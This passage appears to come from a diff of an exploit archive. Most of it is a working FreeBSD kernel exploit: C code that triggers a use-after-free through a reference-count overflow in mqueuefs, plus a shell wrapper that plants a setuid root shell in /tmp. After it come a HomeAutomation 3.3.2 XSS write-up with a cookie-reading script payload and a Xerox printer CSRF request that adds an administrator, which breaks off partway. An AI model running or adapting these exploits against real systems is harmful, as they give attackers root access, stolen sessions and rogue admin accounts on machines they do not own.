// Convenience function to bind a UNIX domain socket
|
||||
int bind_domain_socket(struct sockaddr_un *remote) {
|
||||
int server_socket;
|
||||
|
||||
if ((server_socket = socket(AF_UNIX, SOCK_DGRAM, 0)) == -1) {
|
||||
perror("[!] socket");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
if (bind(server_socket,
|
||||
(struct sockaddr *) remote,
|
||||
sizeof(struct sockaddr_un)) != 0) {
|
||||
perror("[!] bind");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
return server_socket;
|
||||
}
|
||||
|
||||
// Convenience function to connect to a UNIX domain socket
|
||||
int connect_domain_socket_client() {
|
||||
int client_socket;
|
||||
|
||||
if ((client_socket = socket(AF_UNIX, SOCK_DGRAM, 0)) == -1) {
|
||||
perror("[!] socket");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
return client_socket;
|
||||
}
|
||||
|
||||
// Prevent panic at termination because f_count of the
|
||||
// corrupted struct file is 0 at the moment this function
|
||||
// is called but open file descriptors still points to the struct,
|
||||
// hence fdrop() is called at exit of the program and will raise a
|
||||
// kernel panic because f_count will be below 0
|
||||
//
|
||||
// So we just use our known primitive to increase f_count
|
||||
void prevent_panic(int fd)
|
||||
{
|
||||
mq_timedsend(fd, NULL, 0, 0, (const struct timespec *)0x1);
|
||||
mq_timedsend(fd, NULL, 0, 0, (const struct timespec *)0x1);
|
||||
mq_timedsend(fd, NULL, 0, 0, (const struct timespec *)0x1);
|
||||
}
|
||||
|
||||
// Convenience function to stick a thread to a CPU core
|
||||
int stick_thread_to_core(int core) {
|
||||
cpuset_t cpuset;
|
||||
CPU_ZERO(&cpuset);
|
||||
CPU_SET(core, &cpuset);
|
||||
|
||||
pthread_t current_thread = pthread_self();
|
||||
return pthread_setaffinity_np(current_thread, sizeof(cpuset_t), &cpuset);
|
||||
}
|
||||
|
||||
// This function will trigger the use-after-free
|
||||
void *trigger_uaf(void *thread_args) {
|
||||
struct thread_data *thread_data;
|
||||
int fd, fd2;
|
||||
|
||||
if (stick_thread_to_core(CORE_0) != 0) {
|
||||
perror("[!] [!] trigger_uaf: Could not stick thread to core");
|
||||
}
|
||||
|
||||
thread_data = (struct thread_data *)thread_args;
|
||||
fd = thread_data->fd;
|
||||
fd2 = thread_data->fd2;
|
||||
|
||||
printf("[+] trigger_uaf: fd: %d\n", fd);
|
||||
printf("[+] trigger_uaf: fd2: %d\n", fd2);
|
||||
|
||||
// The thread has to wait for the preparation of the
|
||||
// race condition
|
||||
printf("[+] trigger_uaf: Waiting for start signal from monitor\n");
|
||||
pthread_mutex_lock(&trigger_mtx);
|
||||
pthread_cond_wait(&trigger_cond, &trigger_mtx);
|
||||
|
||||
// This sleep parameter helps to render
|
||||
// the exploit more reliable
|
||||
//
|
||||
// Tweeking may be needed for the target system
|
||||
usleep(40);
|
||||
|
||||
// Close two fds to trigger UaF
|
||||
//
|
||||
// This assumes that fget_write() in kern_writev()
|
||||
// was already successful!
|
||||
//
|
||||
// Otherwise kernel panic is triggered
|
||||
//
|
||||
// f_count = 2 (primitive+fget_write)
|
||||
close(fd);
|
||||
close(fd2);
|
||||
// f_count = 0 => free
|
||||
fd = open(ATTACK_PATH, O_RDONLY);
|
||||
// refcount = 1
|
||||
// all fds do now point to the attacked path
|
||||
|
||||
printf("[+] trigger_uaf: Opened read-only file\n");
|
||||
printf("[+] trigger_uaf: Exit\n");
|
||||
|
||||
pthread_exit(NULL);
|
||||
}
|
||||
|
||||
// This function will write to many invalid file streams
|
||||
//
|
||||
// This will eventually increase the number of dirty buffers
|
||||
// in the kernel and creates an exploitable race condition
|
||||
// for the Use-after-Free
|
||||
void *hammer(void *arg) {
|
||||
int i, j, k, client_socket;
|
||||
char buf[FILE_SIZE], sync_buf[3];
|
||||
FILE *fd[N_FILES];
|
||||
struct sockaddr_un remote;
|
||||
|
||||
prepare_domain_socket(&remote, SERVER_PATH);
|
||||
client_socket = connect_domain_socket_client();
|
||||
strncpy(sync_buf, "1\n", 3);
|
||||
|
||||
// Open many files and unlink them directly
|
||||
// to render the file stream invalid
|
||||
for (i = 0; i < N_FILES; i++) {
|
||||
unlink(HAMMER_PATH);
|
||||
if ((fd[i] = fopen(HAMMER_PATH, "w+")) == NULL) {
|
||||
perror("[!] fopen");
|
||||
exit(1);
|
||||
}
|
||||
}
|
||||
|
||||
for (i = 0; i < FILE_SIZE; i++) {
|
||||
buf[i] = 'a';
|
||||
}
|
||||
|
||||
pthread_mutex_lock(&hammer_mtx);
|
||||
|
||||
// Signal that the thread is prepared
|
||||
//
|
||||
// Sometimes sendto() fails because
|
||||
// no free buffer is available
|
||||
for (;;) {
|
||||
if (sendto(client_socket,
|
||||
sync_buf,
|
||||
strlen(sync_buf), 0,
|
||||
(struct sockaddr *) &remote,
|
||||
sizeof(remote)) != -1) {
|
||||
break;
|
||||
}
|
||||
}
|
||||
|
||||
// Wait for the other hammer threads
|
||||
pthread_cond_wait(&hammer_cond, &hammer_mtx);
|
||||
pthread_mutex_unlock(&hammer_mtx);
|
||||
|
||||
// Write to the file streams to create many dirty buffers
|
||||
for (i = 0; i < N; i++) {
|
||||
for (k = 0; k < N_FILES; k++) {
|
||||
rewind(fd[k]);
|
||||
}
|
||||
for (j = 0; j < FILE_SIZE*FILE_SIZE; j += CHUNK_SIZE) {
|
||||
for (k = 0; k < N_FILES; k++) {
|
||||
if (fwrite(&buf[j % FILE_SIZE], sizeof(char), CHUNK_SIZE, fd[k]) < 0) {
|
||||
perror("[!] fwrite");
|
||||
exit(1);
|
||||
}
|
||||
}
|
||||
fflush(NULL);
|
||||
}
|
||||
}
|
||||
|
||||
pthread_exit(NULL);
|
||||
}
|
||||
|
||||
// This function monitors the number of
|
||||
// dirty buffers.
|
||||
//
|
||||
// If enough dirty buffers do exist, a
|
||||
// signal to the write and Use-after-Free
|
||||
// trigger thread is signalled to
|
||||
// execute the actual attack
|
||||
//
|
||||
// Works on UFS only
|
||||
void *monitor_dirty_buffers(void *arg) {
|
||||
int hidirtybuffers, numdirtybuffers;
|
||||
size_t len;
|
||||
|
||||
len = sizeof(int);
|
||||
|
||||
if (sysctlbyname("vfs.hidirtybuffers", &hidirtybuffers, &len, NULL, 0) != 0) {
|
||||
perror("[!] sysctlbyname hidirtybuffers");
|
||||
exit(1);
|
||||
};
|
||||
printf("[+] monitor: vfs.hidirtybuffers: %d\n", hidirtybuffers);
|
||||
|
||||
while(1) {
|
||||
sysctlbyname("vfs.numdirtybuffers", &numdirtybuffers, &len, NULL, 0);
|
||||
if (numdirtybuffers >= hidirtybuffers) {
|
||||
pthread_cond_signal(&write_cond);
|
||||
pthread_cond_signal(&trigger_cond);
|
||||
printf("[+] monitor: Reached hidirtybuffers watermark\n");
|
||||
break;
|
||||
}
|
||||
}
|
||||
|
||||
pthread_exit(NULL);
|
||||
}
|
||||
|
||||
// Check if the write to the attacked
|
||||
// path was successful
|
||||
int check_write(int fd) {
|
||||
char buf[256];
|
||||
int nbytes;
|
||||
struct stat st;
|
||||
|
||||
printf("[+] check_write\n");
|
||||
stat(DEFAULT_PATH, &st);
|
||||
printf("[+] %s size: %lld\n", DEFAULT_PATH, st.st_size);
|
||||
|
||||
stat(ATTACK_PATH, &st);
|
||||
printf("[+] %s size: %lld\n", ATTACK_PATH, st.st_size);
|
||||
|
||||
nbytes = read(fd, buf, strlen(HOOK_LIB));
|
||||
printf("[+] Read bytes: %d\n", nbytes);
|
||||
if (nbytes > 0 && strncmp(buf, HOOK_LIB, strlen(HOOK_LIB)) == 0) {
|
||||
return 1;
|
||||
}
|
||||
else if (nbytes < 0) {
|
||||
perror("[!] check_write:read");
|
||||
printf("[!] check_write:Cannot check if it worked!");
|
||||
return 1;
|
||||
}
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
||||
// This function will execute the write operation
|
||||
// to the attacked path
|
||||
void *write_to_file(void *thread_args) {
|
||||
int fd, fd2, nbytes;
|
||||
int *fd_ptr;
|
||||
char buf[256];
|
||||
struct thread_data *thread_data;
|
||||
struct mq_attr attrs;
|
||||
|
||||
if (stick_thread_to_core(CORE_1) != 0) {
|
||||
perror("[!] write_to_file: Could not stick thread to core");
|
||||
}
|
||||
|
||||
fd_ptr = malloc(sizeof(int));
|
||||
|
||||
attrs.mq_maxmsg = 10;
|
||||
attrs.mq_msgsize = sizeof(int);
|
||||
|
||||
thread_data = (struct thread_data *)thread_args;
|
||||
fd = thread_data->fd;
|
||||
fd2 = open(ATTACK_PATH, O_RDONLY);
|
||||
|
||||
// Wait for the signal to execute the write operation
|
||||
printf("[+] write_to_file: Wait for signal from monitor\n");
|
||||
pthread_mutex_lock(&write_mtx);
|
||||
pthread_cond_wait(&write_cond, &write_mtx);
|
||||
|
||||
// Write to the temporary file
|
||||
//
|
||||
// During the write operation the exploit will trigger
|
||||
// the Use-after-Free and exchange the written file
|
||||
// with the attacked file to render a write to it
|
||||
snprintf(buf, 256, "%s %s\n#", HOOK_LIB, ATTACK_LIB);
|
||||
nbytes = write(fd, buf, strlen(buf));
|
||||
|
||||
// Reopen directly after write to prevent panic later
|
||||
//
|
||||
// After the write f_count == 0 because after trigger_uaf()
|
||||
// opened the read-only file, f_count == 1 and write()
|
||||
// calls fdrop() at the end
|
||||
//
|
||||
// => f_count == 0
|
||||
//
|
||||
// A direct open hopefully assigns the now again free file
|
||||
// object to fd so that we can prevent the panic with our
|
||||
// increment primitive.
|
||||
*fd_ptr = mq_open("/pwn_mq", O_RDWR | O_CREAT, 0666, &attrs);
|
||||
if (*fd_ptr == -1)
|
||||
perror("[!] write_to_file: mq_open");
|
||||
|
||||
if (nbytes < 0) {
|
||||
perror("[!] write_to_file: write");
|
||||
} else if (nbytes > 0) {
|
||||
printf("[+] write_to_file: We have written something...\n");
|
||||
if (check_write(fd2) > 0)
|
||||
printf("[+] write_to_file: It (probably) worked!\n");
|
||||
else
|
||||
printf("[!] write_to_file: It worked not :(\n");
|
||||
}
|
||||
|
||||
printf("[+] write_to_file: Exit\n");
|
||||
pthread_exit(fd_ptr);
|
||||
}
|
||||
|
||||
// This function prepares the Use-after-Free due to
|
||||
// a reference counter overflow
|
||||
void prepare(int fds[3]) {
|
||||
int fd, fd2, fd3, trigger_fd;
|
||||
u_int32_t i;
|
||||
struct mq_attr attrs;
|
||||
attrs.mq_maxmsg = 10;
|
||||
attrs.mq_msgsize = sizeof(int);
|
||||
|
||||
printf("[+] Start UaF preparation\n");
|
||||
printf("[+] This can take a while\n");
|
||||
|
||||
// Open a mqueue file
|
||||
fd = mq_open("/pwn_mq", O_RDWR | O_CREAT, 0666, &attrs);
|
||||
if (fd == -1) {
|
||||
perror("open");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
// fp->f_count will be incremented by 1 per iteration due
|
||||
// to the bug in freebsd32_kmq_timedsend()
|
||||
//
|
||||
// That is, 0xfffffffe iterations will increment it to
|
||||
// 0xffffffff (f_count starts with 1 because of mq_open())
|
||||
//
|
||||
// The bug is triggered because freebsd_kqm_timedsend will eventually
|
||||
// try to call copyin() with the pointer to address 0x1 which
|
||||
// is invalid
|
||||
for (i = 0; i < 0xfffffffe; i++) {
|
||||
// just a progress message, nothing special about the magic values
|
||||
if (i % 0x19999990 == 0)
|
||||
printf("[+] Progress: %d%%\n", (u_int32_t) (i / 0x28f5c28));
|
||||
mq_timedsend(fd, NULL, 0, 0, (const struct timespec *)0x1);
|
||||
}
|
||||
|
||||
// Every dup() increases fp->f_count by 1
|
||||
//
|
||||
// Using dup() works because FreeBSD's mqueue implementation
|
||||
// is implemented by using file objects (struct file) internally.
|
||||
//
|
||||
// This circumvents an infinite loop in fget_unlocked() as dup()
|
||||
// does not use _fget() but fhold() to increase the counter.
|
||||
fd2 = dup(fd);
|
||||
if (fd2 == -1) {
|
||||
perror("dup");
|
||||
exit(1);
|
||||
}
|
||||
fd3 = dup(fd);
|
||||
if (fd3 == -1) {
|
||||
perror("dup");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
// Close the mqueue file to trigger a free operation
|
||||
//
|
||||
// The descriptors fd2 and fd3 will still point
|
||||
// to the freed object
|
||||
//
|
||||
// Opening another file will render these descriptors
|
||||
// to point the newly opened file
|
||||
close(fd);
|
||||
trigger_fd = open_tmp(NULL);
|
||||
|
||||
fds[0] = trigger_fd;
|
||||
fds[1] = fd2;
|
||||
fds[2] = fd3;
|
||||
|
||||
printf("[+] Finished UaF preparation\n");
|
||||
}
|
||||
|
||||
// This function will monitor that all
|
||||
// hammer threads are opened
|
||||
void read_thread_status(int server_socket) {
|
||||
int bytes_rec, count;
|
||||
struct sockaddr_un client;
|
||||
socklen_t len;
|
||||
char buf[256];
|
||||
struct timeval tv;
|
||||
|
||||
tv.tv_sec = 10;
|
||||
tv.tv_usec = 0;
|
||||
setsockopt(server_socket,
|
||||
SOL_SOCKET, SO_RCVTIMEO,
|
||||
(const char*)&tv, sizeof tv);
|
||||
|
||||
for (count = 0; count < NUM_FORKS*NUM_THREADS; count++) {
|
||||
if (count % 100 == 0) {
|
||||
printf("[+] Hammer threads ready: %d\n", count);
|
||||
}
|
||||
bzero(&client, sizeof(struct sockaddr_un));
|
||||
bzero(buf, 256);
|
||||
|
||||
len = sizeof(struct sockaddr_un);
|
||||
if ((bytes_rec = recvfrom(server_socket,
|
||||
buf, 256, 0,
|
||||
(struct sockaddr *) &client,
|
||||
&len)) == -1) {
|
||||
perror("[!] recvfrom");
|
||||
break;
|
||||
}
|
||||
}
|
||||
|
||||
if (count != NUM_FORKS * NUM_THREADS) {
|
||||
printf("[!] Could not create all hammer threads, will try though!\n");
|
||||
}
|
||||
}
|
||||
|
||||
// This function will execute the whole exploit
|
||||
void fire() {
|
||||
int i, j, fd, fd2, fd3, bytes_rec, server_socket;
|
||||
int sv[2], fds[3], hammer_socket[NUM_FORKS];
|
||||
int *fd_ptr;
|
||||
char socket_path[256], sync_buf[3], buf[256];
|
||||
pthread_t write_thread, trigger_thread, monitor_thread;
|
||||
pthread_t hammer_threads[NUM_THREADS];
|
||||
pid_t pids[NUM_FORKS];
|
||||
socklen_t len;
|
||||
struct thread_data thread_data;
|
||||
struct sockaddr_un server, client;
|
||||
struct sockaddr_un hammer_socket_addr[NUM_FORKS];
|
||||
|
||||
// Socket for receiving thread status
|
||||
unlink(SERVER_PATH);
|
||||
prepare_domain_socket(&server, SERVER_PATH);
|
||||
server_socket = bind_domain_socket(&server);
|
||||
|
||||
// Sockets to receive hammer signal
|
||||
for (i = 0; i < NUM_FORKS; i++) {
|
||||
snprintf(socket_path, sizeof(socket_path), "%s%c", SERVER_PATH, '1'+i);
|
||||
unlink(socket_path);
|
||||
prepare_domain_socket(&hammer_socket_addr[i], socket_path);
|
||||
hammer_socket[i] = bind_domain_socket(&hammer_socket_addr[i]);
|
||||
}
|
||||
|
||||
strncpy(sync_buf, "1\n", 3);
|
||||
len = sizeof(struct sockaddr_un);
|
||||
|
||||
if (socketpair(PF_UNIX, SOCK_STREAM, 0, sv) == -1) {
|
||||
perror("[!] socketpair");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
pthread_mutex_init(&write_mtx, NULL);
|
||||
pthread_mutex_init(&trigger_mtx, NULL);
|
||||
pthread_cond_init(&write_cond, NULL);
|
||||
pthread_cond_init(&trigger_cond, NULL);
|
||||
|
||||
// Create the thread to monitor the number of
|
||||
// dirty buffers directly in the beginning
|
||||
// to be ready when needed
|
||||
pthread_create(&monitor_thread, NULL, monitor_dirty_buffers, NULL);
|
||||
|
||||
// Prepare the UaF using the 0day
|
||||
prepare(fds);
|
||||
fd = fds[0];
|
||||
fd2 = fds[1];
|
||||
fd3 = fds[2];
|
||||
|
||||
// Create the threads which will execute the exploit
|
||||
thread_data.fd = fd;
|
||||
thread_data.fd2 = fd2;
|
||||
pthread_create(&trigger_thread, NULL, trigger_uaf, (void *) &thread_data);
|
||||
pthread_create(&write_thread, NULL, write_to_file, (void *) &thread_data);
|
||||
|
||||
for (j = 0; j < NUM_FORKS; j++) {
|
||||
if ((pids[j] = fork()) < 0) {
|
||||
perror("[!] fork");
|
||||
abort();
|
||||
}
|
||||
else if (pids[j] == 0) {
|
||||
// Close the file descriptors
|
||||
// becasue each fork will have an own reference
|
||||
// to the file object, thus increasing the
|
||||
// reference counter
|
||||
close(fd);
|
||||
close(fd2);
|
||||
close(fd3);
|
||||
pthread_mutex_init(&hammer_mtx, NULL);
|
||||
pthread_cond_init(&hammer_cond, NULL);
|
||||
|
||||
// Create the hammer threads
|
||||
for (i = 0; i < NUM_THREADS; i++) {
|
||||
pthread_create(&hammer_threads[i], NULL, hammer, NULL);
|
||||
}
|
||||
|
||||
printf("[+] Fork %d created all threads\n", j);
|
||||
|
||||
// Wait for the signal to start hammering from the parent
|
||||
if ((bytes_rec = recvfrom(hammer_socket[j],
|
||||
buf, 256, 0,
|
||||
(struct sockaddr *) &client,
|
||||
&len)) == -1) {
|
||||
perror("[!] accept");
|
||||
abort();
|
||||
}
|
||||
|
||||
// Broadcast to the hammer threads to
|
||||
// start hammering
|
||||
pthread_cond_broadcast(&hammer_cond);
|
||||
|
||||
// Wait for the hammer threads
|
||||
for (i = 0; i < NUM_THREADS; i++) {
|
||||
pthread_join(hammer_threads[i], NULL);
|
||||
}
|
||||
|
||||
pthread_cond_destroy(&hammer_cond);
|
||||
pthread_mutex_destroy(&hammer_mtx);
|
||||
|
||||
exit(0);
|
||||
} else {
|
||||
printf("[+] Created child with PID %d\n", pids[j]);
|
||||
}
|
||||
}
|
||||
|
||||
// Wait for the preparation of all hammer threads
|
||||
// in the forks.
|
||||
//
|
||||
// If all are prepared, send a signal to the childs
|
||||
// to start the hammering process to create dirty
|
||||
// buffers.
|
||||
read_thread_status(server_socket);
|
||||
printf("[+] Send signal to Start Hammering\n");
|
||||
for (i = 0; i < NUM_FORKS; i++) {
|
||||
if (sendto(hammer_socket[i],
|
||||
sync_buf,
|
||||
strlen(sync_buf), 0,
|
||||
(struct sockaddr *) &hammer_socket_addr[i],
|
||||
sizeof(hammer_socket_addr[0])) == -1) {
|
||||
perror("[!] sendto");
|
||||
exit(1);
|
||||
}
|
||||
}
|
||||
|
||||
// Wait for all threads to finish
|
||||
pthread_join(monitor_thread, NULL);
|
||||
for (i = 0; i < NUM_FORKS; i++) {
|
||||
kill(pids[i], SIGKILL);
|
||||
printf("[+] Killed %d\n", pids[i]);
|
||||
}
|
||||
|
||||
pthread_join(write_thread, (void **) &fd_ptr);
|
||||
pthread_join(trigger_thread, NULL);
|
||||
|
||||
pthread_mutex_destroy(&write_mtx);
|
||||
pthread_mutex_destroy(&trigger_mtx);
|
||||
pthread_cond_destroy(&write_cond);
|
||||
pthread_cond_destroy(&trigger_cond);
|
||||
|
||||
// Prevent a kernel panic
|
||||
prevent_panic(*fd_ptr);
|
||||
|
||||
// fd was acquired from write_to_file
|
||||
// which allocs a pointer for it
|
||||
free(fd_ptr);
|
||||
}
|
||||
|
||||
int main(int argc, char **argv)
|
||||
{
|
||||
setbuf(stdout, NULL);
|
||||
|
||||
fire();
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
||||
EOF
|
||||
|
||||
# Compile with -m32 to exploit FreeBSD-SA-19:24.mqueuefs
|
||||
cc -o exploit -lpthread exploit.c
|
||||
# cc -o exploit -m32 -lpthread exploit.c
|
||||
|
||||
cat > program.c << EOF
|
||||
#include <unistd.h>
|
||||
#include <stdio.h>
|
||||
#include <sys/types.h>
|
||||
#include <stdlib.h>
|
||||
|
||||
void _init()
|
||||
{
|
||||
if (!geteuid())
|
||||
execl("/bin/sh","sh","-c","/bin/cp /bin/sh /tmp/xxxx ; /bin/chmod +xs /tmp/xxxx",NULL);
|
||||
}
|
||||
|
||||
EOF
|
||||
|
||||
# Compile the shared library object
|
||||
cc -o program.o -c program.c -fPIC
|
||||
cc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o -nostartfiles
|
||||
cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0
|
||||
|
||||
# Start the exploit
|
||||
#
|
||||
# su will execute the shared library object
|
||||
# that creates the shell binary copy
|
||||
echo "[+] Firing the Exploit"
|
||||
./exploit
|
||||
su
|
||||
|
||||
# Ensure that everything has worked
|
||||
# and execute the root-shell
|
||||
if [ -f /tmp/xxxx ]; then
|
||||
echo "[+] Enjoy!"
|
||||
echo "[+] Do not forget to copy ./libmap.conf back to /etc/libmap.conf"
|
||||
/tmp/xxxx
|
||||
else
|
||||
echo "[!] FAIL"
|
||||
fi
|
115
exploits/hardware/webapps/47806.txt
Normal file
115
exploits/hardware/webapps/47806.txt
Normal file
|
@ -0,0 +1,115 @@
|
|||
# Exploit: HomeAutomation 3.3.2 - Persistent Cross-Site Scripting
|
||||
# Date: 2019-12-30
|
||||
# Author: LiquidWorm
|
||||
# Vendor: Tom Rosenback and Daniel Malmgren
|
||||
# Product web page: http://karpero.mine.nu/ha/
|
||||
# Affected version: 3.3.2
|
||||
# Tested on: Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips
|
||||
# Advisory ID: ZSL-2019-5556
|
||||
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5556.php
|
||||
# HomeAutomation v3.3.2 Stored and Reflected XSS
|
||||
|
||||
|
||||
Vendor: Tom Rosenback and Daniel Malmgren
|
||||
Product web page: http://karpero.mine.nu/ha/
|
||||
Affected version: 3.3.2
|
||||
|
||||
Summary: HomeAutomation is an open-source web interface and scheduling solution.
|
||||
It was initially made for use with the Telldus TellStick, but is now based on a
|
||||
plugin system and except for Tellstick it also comes with support for Crestron,
|
||||
OWFS and Z-Wave (using OpenZWave). It controls your devices (switches, dimmers,
|
||||
etc.) based on an advanced scheduling system, taking into account things like
|
||||
measurements from various sensors. With the houseplan view you can get a simple
|
||||
overview of the status of your devices at their location in your house.
|
||||
|
||||
Desc: HomeAutomation suffers from multiple stored and reflected XSS vulnerabilities
|
||||
when input passed via several parameters to several scripts is not properly sanitized
|
||||
before being returned to the user. This can be exploited to execute arbitrary HTML
|
||||
and script code in a user's browser session in context of an affected site.
|
||||
|
||||
Tested on: Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips
|
||||
Apache/2.4.29 (Ubuntu)
|
||||
PHP/7.4.0RC4
|
||||
PHP/7.3.11
|
||||
PHP 7.2.24-0ubuntu0.18.04.1
|
||||
|
||||
|
||||
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||
@zeroscience
|
||||
|
||||
|
||||
Advisory ID: ZSL-2019-5556
|
||||
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5556.php
|
||||
|
||||
|
||||
06.11.2019
|
||||
|
||||
--
|
||||
|
||||
|
||||
Reflected XSS:
|
||||
--------------
|
||||
|
||||
https://192.168.2.113/?page=houseplan&autologin=1&msg=eyJpZCI6IiIsInRleHQiOiI8bWFycXVlZT50ZXN0PC9tYXJxdWVlPlVzZXJuYW1lIG9yIHBhc3N3b3JkIHdyb25nIiwiYWRkaXRpb25hbFRleHQiOiIiLCJ0eXBlIjoiZXJyb3IiLCJhdXRvQ2xvc2UiOmZhbHNlLCJzaG93T25seUluRGVidWciOmZhbHNlfQ==
|
||||
|
||||
|
||||
Stored XSS:
|
||||
-----------
|
||||
|
||||
POST /homeautomation_v3_3_2/?page=conf-macros HTTP/1.1
|
||||
Host: localhost
|
||||
Connection: keep-alive
|
||||
Content-Length: 998
|
||||
Cache-Control: max-age=0
|
||||
Origin: http://localhost
|
||||
Upgrade-Insecure-Requests: 1
|
||||
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryq4LcgA7mbqElCW4q
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36
|
||||
Sec-Fetch-User: ?1
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
|
||||
Sec-Fetch-Site: same-origin
|
||||
Sec-Fetch-Mode: navigate
|
||||
Referer: http://localhost/homeautomation_v3_3_2/?page=conf-macros&action=edit&id=-1
|
||||
Accept-Encoding: gzip, deflate, br
|
||||
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
|
||||
Cookie: HomeAutomation_user=admin; HomeAutomation_hash=842427e5fc831255d7aa811b70e64957; PHPSESSID=ldcipit064rfp5l8rtcah091og
|
||||
|
||||
|
||||
------WebKitFormBoundaryq4LcgA7mbqElCW4q
|
||||
Content-Disposition: form-data; name="id"
|
||||
|
||||
-1
|
||||
------WebKitFormBoundaryq4LcgA7mbqElCW4q
|
||||
Content-Disposition: form-data; name="action"
|
||||
|
||||
save
|
||||
------WebKitFormBoundaryq4LcgA7mbqElCW4q
|
||||
Content-Disposition: form-data; name="name"
|
||||
|
||||
XSS
|
||||
------WebKitFormBoundaryq4LcgA7mbqElCW4q
|
||||
Content-Disposition: form-data; name="comment"
|
||||
|
||||
"><script>confirm(document.cookie)</script>
|
||||
------WebKitFormBoundaryq4LcgA7mbqElCW4q
|
||||
Content-Disposition: form-data; name="icon_on"; filename=""
|
||||
Content-Type: application/octet-stream
|
||||
|
||||
|
||||
------WebKitFormBoundaryq4LcgA7mbqElCW4q
|
||||
Content-Disposition: form-data; name="scenario"
|
||||
|
||||
1
|
||||
------WebKitFormBoundaryq4LcgA7mbqElCW4q
|
||||
Content-Disposition: form-data; name="devices[0]"
|
||||
|
||||
1
|
||||
------WebKitFormBoundaryq4LcgA7mbqElCW4q
|
||||
Content-Disposition: form-data; name="statuses[0]"
|
||||
|
||||
1
|
||||
------WebKitFormBoundaryq4LcgA7mbqElCW4q
|
||||
Content-Disposition: form-data; name="save"
|
||||
|
||||
Save
|
||||
------WebKitFormBoundaryq4LcgA7mbqElCW4q--
|
73
exploits/hardware/webapps/47813.txt
Normal file
73
exploits/hardware/webapps/47813.txt
Normal file
|
@ -0,0 +1,73 @@
|
|||
# Exploit Title: XEROX WorkCentre 6655 Printer - Cross-Site Request Forgery (Add Admin)
|
||||
# Date: 2018-12-19
|
||||
# Exploit Author: Ismail Tasdelen
|
||||
# Vendor Homepage: https://www.xerox.com/
|
||||
# Hardware Link : https://www.office.xerox.com/en-us/multifunction-printers/workcentre-6655
|
||||
# Software : Xerox Printer
|
||||
# Product Version: WorkCentre® 6655
|
||||
# Vulernability Type : Cross-Site Request Forgery (Add Admin)
|
||||
# Vulenrability : Cross-Site Request Forgery
|
||||
# CVE : N/A
|
||||
|
||||
# Description :
|
||||
# The CSRF vulnerability was discovered in the WorkCentre® 6655 printer model of Xerox printer hardware.
|
||||
# A request to add users is made in the Device User Database form field. This request is captured by
|
||||
# the proxy. And a CSRF PoC HTML file is prepared. Xerox WorkCentre® 6655 printers allow CSRF. A request
|
||||
# to add users is made in the Device User Database form field to the xerox.set URI.
|
||||
# (The frmUserName value must have a unique name.)
|
||||
|
||||
|
||||
HTTP POST Request :
|
||||
|
||||
POST /dummypost/xerox.set HTTP/1.1
|
||||
Host: server
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 494
|
||||
Origin: https://server
|
||||
Connection: close
|
||||
Referer: https://server/properties/authentication/UserEdit.php?x=&isRoles=True&isPassword=True&isCreate=True&crumb1=UserManager%3Fx%3D%26sort%3DFname%26order%3DUp
|
||||
Cookie: PHPSESSID=d7c4d8f8efe7dd919e6d0f5c93ec16cd; PageToShow=; statusSelected=n1; statusNumNodes=9; frmFirstName=%22%3E%3Ch1%3Ea; frmLastName=%22%3E%3Ch1%3Ea; frmCompany=%22%3E%3Ch1%3Ea; frmDisplayName=%22%3E%3Ch1%3Ea%2C%20%22%3E%3Ch1%3Ea; frmEmail=test@test.com; frmIFax=324324324324; frmFaxNumber=324324324324; frmFriendlyName=; frmProtocol=SMB; frmXrxAdd_1=Ipv4; frmDocumentPath=; frmLoginName=; frmServerName=; frmServerVolume=; frmNdsTree=; frmNdsContext=; frmSmbShare=; frmHnAdd_1=; frmIpv4_1_1=0; frmIpv4_1_2=0; frmIpv4_1_3=0; frmIpv4_1_4=0; frmIpv6_Host_1=%3A%3A; WebTimerPopupID=4; propSelected=n28; propNumNodes=117; propHierarchy=000100000000000000000000000; LastPage=/properties/authentication/UserEdit.php%3F%26isRoles%3DTrue%26isPassword%3DTrue%26isCreate%3DTrue
|
||||
Upgrade-Insecure-Requests: 1
|
||||
|
||||
CSRFToken=72d9d94444730e9b3d16953c7987c2b0cff73a5d6c60df40ba2804f07d24e494148665ebb53a2633e5a1e8b73ef64ad02536d260928c6f10f408f2e3fd7c0776&_fun_function=HTTP_Set_ccgen_fac_dispatch_fn&NextPage=%2Fproperties%2Fauthentication%2FUserManager.php%3Fx%3D%26sort%3DFname%26order%3DUp&CcgenModule=UserEdit&isRoles=True&isPassword=True&isCreate=True&rolesStr=2%2C5%2C1%2C&limited=False&oid=0&userName=ismailtasdelen&friendlyName=Ismail+Tasdelen&newPassword=Test1234&retypePassword=Test1234&role=2&role=1
|
||||
|
||||
HTTP Response :
|
||||
|
||||
HTTP/1.1 200 OK
|
||||
Date: Wed, 18 Dec 2019 22:09:40 GMT
|
||||
Server: Apache
|
||||
Connection: close
|
||||
Content-Type: text/html
|
||||
Content-Length: 13518
|
||||
|
||||
CSRF HTML PoC :
|
||||
|
||||
<html>
|
||||
<!-- CSRF PoC - generated by Burp Suite Professional -->
|
||||
<body>
|
||||
<script>history.pushState('', '', '/')</script>
|
